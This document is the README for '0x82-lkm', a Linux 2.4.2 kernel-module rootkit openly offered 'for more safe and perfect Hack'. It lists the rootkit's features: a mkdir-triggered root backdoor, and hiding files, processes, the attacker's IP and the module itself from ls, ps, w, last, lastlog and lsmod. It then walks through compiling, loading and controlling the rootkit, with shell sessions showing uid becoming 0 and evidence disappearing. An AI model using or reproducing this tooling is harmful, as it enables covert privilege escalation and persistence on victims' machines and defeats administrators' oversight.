Linux LKM (Loadable Kernel Module) Backdoor for linux kernel v2.4.2


 This tool can do that is manufactured for more safe and perfect Hack.
 Now yet, is having minimum function, and version is v0.2.

 After search simple function, express explanation about the directions.
 Embodied function is as following.


 =-=-=- Functions -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


 0x01. SetUID zer0 Backd00r (make directory).
    -. Competence rise by specification directory creation. (uid=0)

 0x02. Directory hidden (directory not move).
    -. To hide directory function.

 0x03. File hidden (file hide).
    -. To hide file function.

 0x04. ls command spoof (file & dir not view).
    -. To deceive `ls' command function.

 0x05. ps command spoof (process hide).
    -. To deceive `ps' command function

 0x06. w, netstat, finger, last, lastlog commands spoof (attacker ip hide).
    -. To deceive w, netstat, finget, last, lastlog commands function

 0x07. hidden LKM Backdoor.
    -. To hide specification module that rise function (does not read module)


 Upside functions wrote by code comment.
 Then, explain about use method.


 =-=-=- Usages -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


 Compile: bash-2.04# gcc -c 0x82-lkm.c
 Install: bash-2.04# insmod 0x82-lkm.o

 attribute:

 file - System file.
 dir  - Directory.
 proc - Process.
 ip   - Attacker IP.
 mod  - Attacker module.

 LKM control function that consist through cd command:

 bash-2.04# cd 'discernment key'-'attribute'-'hide name'

 (For reference, 'discernment key' is Compile 'x82' by Default.)

 - Competence rise by specification directory creation. (uid=0) -


 bash-2.04$ id
 uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$ mkdir x82-dir
 bash-2.04$ id
 uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$    

 Setting price gets caught as "x82-dir" by Default,
 The name of directory must use name that is specified to concealment directory necessarily.


 - To change the concealment name of directory. -


 bash-2.04$ cd x82-dir-direct
 bash: cd: x82: No such file or directory
 bash-2.04$ id
 uid=501(x82) gid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$ mkdir direct
 bash-2.04$ id
 uid=0(root) gid=0(root) euid=501(x82) groups=501(x82),10(wheel)
 bash-2.04$            

 With cd command, can see that put as "x82-dir-direct" by argument.
 Argument is analyzed as following.

 x82-dir-direct: x82 (discernment key) - dir (attribute) - direct (hide name)


 - File hidden (file hide). -


 discernment key, attribute, hide name.
 Similarly, if put sequentially, hide file and directory.

 example> testfile hidden.

 bash-2.04$ touch testfile
 bash-2.04$ ls -al testfile
 -rw-rw-r--    1 x82      x82             0 Apr 14 23:54 testfile
 bash-2.04$ cd x82-file-testfile
 bash: cd: x82: No such file or directory
 bash-2.04$ ls -al testfile
 bash-2.04$ cat testfile
 cat: testfile: No such file or directory
 bash-2.04$


 - ps command spoof (process hide). -


 If input depending on condition, can hide process as following.

 example> login process hidden.

 bash-2.04$ ps
   PID TTY          TIME CMD
  8364 pts/1    00:00:00 login
  8442 pts/1    00:00:00 ps
 bash-2.04$ cd x82-proc-login
 bash: cd: x82: No such file or directory
 bash-2.04$ ps
   PID TTY          TIME CMD
  8443 pts/1    00:00:00 ps
 bash-2.04$   


 - To hide attacker IP function. -


 Do to hide IP address as following.

 (example) Attacker IP: 61.27.144.81

 bash-2.04$ cd x82-ip-61.27.144.81
 bash: cd: x82: No such file or directory
 bash-2.04$ w
 12:11am  up 6 days,  6:46,  1 user,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT
 x82      pts/1    ............     11:45pm  0.00s  0.09s  0.01s  w
 bash-2.04$ lastlog
 x82              pts/1    ............     XXX XXX 14 23:45:29 +0900 2002
 bash-2.04$ last
 x82      pts/1        ............     XXX XXX 14 23:45   still logged in
 x82      pts/1        ............     XXX XXX 14 23:43 - 23:45  (00:02)
 x82      pts/1        ............     XXX XXX 14 23:11 - 23:15  (00:03)
 
 wtmp begins XXX XXX 14 23:11:29 2002
 bash-2.04$

 With upside, attacker IP has been marked by all '.' (dot).

 
 - To hide LKM module -


 Basically, is selected to hide '0x82-lkm' module.
 You can change easily this.

 bash-2.04# /sbin/lsmod | grep 0x82-lkm
 bash-2.04# /sbin/lsmod
 Module                  Size  Used by
 8139too                16512   1  (autoclean)
 usb-uhci               20752   0  (unused)
 usbcore                49728   1  [usb-uhci]
 bash-2.04# cd x82-mod-usbcore
 bash: cd: x82: No such file or directory
 bash-2.04# /sbin/lsmod | grep usbcore
 bash-2.04#     

 Herewith, can do to hide perfectly to LKM that attacker makes.


 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


 It was as result that try test in my Linux 7.1 Kernel 2.4.2.
 Because did not try test in version, problem can happen.
 Be stewardly lest Kernel should die. :-)

 
 Author: Xpl017Elz in INetCop(c).
 E-mail: szoahc@hotmail.com & xploit@hackermail.com
 Home: http://x82.i21c.net